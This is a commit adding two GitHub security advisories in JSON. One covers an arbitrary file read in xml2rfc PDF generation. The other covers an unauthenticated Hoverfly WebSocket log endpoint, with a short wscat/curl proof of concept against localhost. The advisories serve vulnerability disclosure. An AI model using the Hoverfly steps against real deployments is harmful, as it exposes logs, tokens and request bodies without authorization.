Publish Advisories

GHSA-9mv7-3c64-mmqw
GHSA-jxmr-2h4q-rhxp

Author: advisory-database[bot]

advisories/github-reviewed/2025/09/GHSA-9mv7-3c64-mmqw/GHSA-9mv7-3c64-mmqw.json

@@ -0,0 +1,63 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-9mv7-3c64-mmqw",
+  "modified": "2025-09-10T20:44:58Z",
+  "published": "2025-09-10T20:44:58Z",
+  "aliases": [],
+  "summary": "xml2rfc is vulnerable to arbitrary file reads through prepped files",
+  "details": "### Impact\n\nWhen generating PDF files, this vulnerability allows an attacker to read arbitrary files from the filesystem by injecting malicious link element into the prepped RFCXML.\n\n### Workarounds\n\nTest untrusted input with `link` elements with `rel=\"attachment\"` before processing.\n\n### References\nThis is related to [GHSA-cfmv-h8fx-85m7](https://github.com/ietf-tools/xml2rfc/security/advisories/GHSA-cfmv-h8fx-85m7).",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "PyPI",
+        "name": "xml2rfc"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "3.30.2"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/ietf-tools/xml2rfc/security/advisories/GHSA-9mv7-3c64-mmqw"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/ietf-tools/xml2rfc/commit/73fb1c91fc62ac540bb6bd24f982f2becf84c1b0"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/ietf-tools/xml2rfc"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/ietf-tools/xml2rfc/releases/tag/v3.30.2"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-22"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2025-09-10T20:44:58Z",
+    "nvd_published_at": null
+  }
+}

advisories/github-reviewed/2025/09/GHSA-jxmr-2h4q-rhxp/GHSA-jxmr-2h4q-rhxp.json

@@ -0,0 +1,61 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-jxmr-2h4q-rhxp",
+  "modified": "2025-09-10T20:43:49Z",
+  "published": "2025-09-10T20:43:49Z",
+  "aliases": [
+    "CVE-2025-54376"
+  ],
+  "summary": "WebSocket endpoint `/api/v2/ws/logs` reachable without authentication even when --auth is enabled",
+  "details": "### Summary\nHoverfly’s admin WebSocket endpoint /api/v2/ws/logs is not protected by the same authentication middleware that guards the REST admin API.\nConsequently, an unauthenticated remote attacker can:\n\n- Stream real-time application logs (information disclosure).\n- Gain insight into internal file paths, request/response bodies, and other potentially sensitive data emitted in logs.\n\n### PoC\n1. Start Hoverfly with authentication enabled:\n\n```\n./hoverfly -auth\n```\n\n2. Confirm REST API requires credentials:\n\n```\ncurl -i http://localhost:8888/api/v2/hoverfly/version\n```\n\n3. Connect to the WebSocket endpoint without credentials:\n\n\n```\nwscat -c ws://localhost:8888/api/v2/ws/logs\n# Connected (press CTRL+C to quit)\n# … logs stream immediately … (You would need to send a message to start receiving stream)\n```\n\n```\nwscat -c ws://localhost:8888/api/v2/ws/logs\nConnected (press CTRL+C to quit)\n> hi!\n< {\"logs\":[{\"level\":\"info\",\"msg\":\"Log level set to verbose\",\"time\":\"2025-07-20T17:07:00+05:30\"},{\"level\":\"info\",\"msg\":\"Using memory backend\",\"time\":\"2025-07-20T17:07:00+05:30\"},{\"level\":\"info\",\"msg\":\"User added successfully\",\"time\":\"2025-07-20T17:07:00+05:30\",\"username\":\"\"},{\"level\":\"info\",\"msg\":\"Enabling proxy authentication\",\"time\":\"2025-07-20T17:07:00+05:30\"},{\"Destination\":\".\",\"Mode\":\"simulate\",\"ProxyPort\":\"8500\",\"level\":\"info\",\"msg\":\"Proxy prepared...\",\"time\":\"2025-07-20T17:07:00+05:30\"},{\"destination\":\".\",\"level\":\"info\",\"mode\":\"simulate\",\"msg\":\"current proxy configuration\",\"port\":\"8500\",\"time\":\"2025-07-20T17:07:00+05:30\"},{\"level\":\"info\",\"msg\":\"serving proxy\",\"time\":\"2025-07-20T17:07:00+05:30\"},{\"AdminPort\":\"8888\",\"level\":\"info\",\"msg\":\"Admin interface is starting...\",\"time\":\"2025-07-20T17:07:00+05:30\"},{\"level\":\"debug\",\"message\":\"hi!\",\"msg\":\"Got message...\",\"time\":\"2025-07-20T17:09:04+05:30\"}]}\n< ...\n< ...\n```\n\n### Impact\nAuthentication bypass; an attacker receives full application logs, including proxied request/response bodies, tokens, file paths, etc.",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/SpectoLabs/hoverfly"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "1.12.0"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/SpectoLabs/hoverfly/security/advisories/GHSA-jxmr-2h4q-rhxp"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/SpectoLabs/hoverfly/commit/ffc2cc34563de67fe1a04f7ba5d78fa2d4564424"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/SpectoLabs/hoverfly"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-287"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2025-09-10T20:43:49Z",
+    "nvd_published_at": null
+  }
+}